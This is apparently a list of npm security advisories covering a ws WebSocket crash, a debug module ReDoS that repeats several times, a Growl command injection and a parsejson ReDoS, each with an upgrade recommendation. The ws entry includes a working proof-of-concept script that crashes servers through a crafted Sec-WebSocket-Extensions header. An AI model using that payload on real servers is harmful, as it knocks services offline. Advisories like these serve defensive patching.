Denial of Service

Overview:

A specially crafted value of the Sec-WebSocket-Extensions header that used Object.prototype property names as extension or parameter names could be used to make a ws server crash.

Proof of concept:

const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});

Recommendation:

Upgrade to version 3.3.1 or greater

Regular Expression Denial of Service

Overview:

The debug module is vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter. It takes around 50k characters to block for 2 seconds making this a low severity issue.

Recommendation:

Upgrade to version 2.6.9 or greater if you are on the 2.6.x series or 3.1.0 or greater.

Regular Expression Denial of Service

Overview:

The debug module is vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter. It takes around 50k characters to block for 2 seconds making this a low severity issue.

Recommendation:

Upgrade to version 2.6.9 or greater if you are on the 2.6.x series or 3.1.0 or greater.

Regular Expression Denial of Service

Overview:

The debug module is vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter. It takes around 50k characters to block for 2 seconds making this a low severity issue.

Recommendation:

Upgrade to version 2.6.9 or greater if you are on the 2.6.x series or 3.1.0 or greater.

Command Injection

Overview:

Growl adds growl notification support to nodejs.

Growl does not properly sanitize input before passing it to exec, allowing for arbitrary command execution.

Recommendation:

Update to version 1.10.2 or greater

Regular Expression Denial of Service

Overview:

The debug module is vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter. It takes around 50k characters to block for 2 seconds making this a low severity issue.

Recommendation:

Upgrade to version 2.6.9 or greater if you are on the 2.6.x series or 3.1.0 or greater.

Regular Expression Denial of Service

Overview:

The parsejson module is vulnerable to regular expression denial of service when untrusted user input is passed into it to be parsed.

Recommendation:

Until a fix is available do not use parsejson to parse json. Use JSON.parse() instead if available.

Regular Expression Denial of Service

Overview:

The debug module is vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter. It takes around 50k characters to block for 2 seconds making this a low severity issue.

Recommendation:

Upgrade to version 2.6.9 or greater if you are on the 2.6.x series or 3.1.0 or greater.

Regular Expression Denial of Service

Overview:

The debug module is vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter. It takes around 50k characters to block for 2 seconds making this a low severity issue.

Recommendation:

Upgrade to version 2.6.9 or greater if you are on the 2.6.x series or 3.1.0 or greater.

Regular Expression Denial of Service

Overview:

The debug module is vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter. It takes around 50k characters to block for 2 seconds making this a low severity issue.

Recommendation:

Upgrade to version 2.6.9 or greater if you are on the 2.6.x series or 3.1.0 or greater.